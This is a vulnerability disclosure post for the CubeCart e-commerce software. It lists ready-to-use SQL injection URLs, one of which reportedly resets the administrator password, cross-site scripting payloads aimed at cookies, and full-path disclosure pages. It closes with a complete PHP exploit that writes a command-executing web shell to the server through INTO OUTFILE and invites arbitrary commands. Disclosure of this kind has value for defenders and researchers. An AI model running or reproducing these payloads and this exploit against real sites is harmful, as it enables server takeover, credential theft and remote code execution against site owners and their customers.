Hello,,
CubeCart Multiple input Validation vulnerabilities
Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security (at) soqor (dot) net [email concealed]
Sql injection
admin/forgot_pass.php?submit=1&user_name=-1'or%201=1/*
it will reset the password for the administrator
--
admin/forgot_pass.php?submit=1&user_name=-1'%20union%20select%201,2,3,4,
5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
,31,32,33,34,35,36,37,38,39,40,41,42/*
--
view_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,
13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
--
view_doc.php?view_doc=-1'%20union%20select%201,2/*
--
admin/print_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10
,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
/***************************************/
xss
admin/print_order.php?order_id=<script>alert(document.cookie);</script>
--
view_order.php?order_id=<script>alert(document.cookie);</script>
--
admin/nav.php?site_url="><script>alert(document.cookie);</script><noscri
pt>
admin/nav.php?la_search_home=<script>alert(document.cookie);</script>
and language variables for this file ..
--
admin/image.php?image=<script>alert(document.cookie);</script>
--
admin/header.inc.php?site_name=</title><script>alert(document.cookie);</
script>
admin/header.inc.php?la_adm_header=</title><script>alert(document.cookie
);</script>
admin/header.inc.php?charset='><script>alert(document.cookie);</script>
and all other variables in this file
--
footer.inc.php?la_pow_by=<script>alert(document.cookie);</script>
--
header.inc.php?site_name=</title><script>alert(document.cookie);</script
>
and all other variables in the file.
--
/***************************************/
Full path
information.php
language.php
link_navi.php?cat_id=1
list_docs.php
popular_prod.php
sale.php
check_sum.php
spotlight.php
cat_navi.php
/***************************************/
Exploit :-
#!/usr/bin/php -q -d short_open_tag=on
<?
/*
/* CubeCart Remote sql injection exploit
/* By : HACKERS PAL
/* WwW.SoQoR.NeT
/*
/* Tested on CubeCart 2.0.X and maybe other versions are injected
*/
print_r('
/**********************************************/
/* CubeCart Remote sql injection exploit */
/* by HACKERS PAL <security (at) soqor (dot) net [email concealed]> */
/* site: http://www.soqor.net */');
if ($argc<2) {
print_r('
/* -- */
/* Usage: php '.$argv[0].' host
/* Example: */
/* php '.$argv[0].' http://localhost/CubeCart/
/**********************************************/
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
$url=$argv[1];
$exploit1="/cat_navi.php";
Function get_page($url)
{
if(function_exists("file_get_contents"))
{
$contents = file_get_contents($url);
}
else
{
$fp=fopen("$url","r");
while($line=fread($fp,1024))
{
$contents=$contents.$line;
}
}
return $contents;
}
$page = get_page($url.$exploit1);
$pa=explode("<b>",$page);
$pa=explode("</b>",$pa[2]);
$path = str_replace("cat_navi.php","",$pa[0])."soqor.php";
$var=' ';
$var = str_replace(" ","",$var);
$path = str_replace($var,"/",$path);
$exploit2="/view_doc.php?view_doc=-1'%20union%20select%20'<?php%20system
(".'$_GET[cmd]'.");%20?>','WwW.SoQoR.NeT'%20INTO%20OUTFILE%20'$path'%20f
rom%20store_docs/*";
$page_now = get_page($url.$exploit2);
if(ereg("mysql_fetch_array()",$page_now))
{
$newurl=$url."/soqor.php?cmd=id";
Echo "n[+] Go TO ".str_replace("//","/",$newurl)."n[+] Change id to any command you want :)";
}
else
{
Echo "n[-] Exploit Faild";
}
Die("n/* Visit us : WwW.SoQoR.NeT */n/**********************************************/");
?>
#WwW.SoQoR.NeT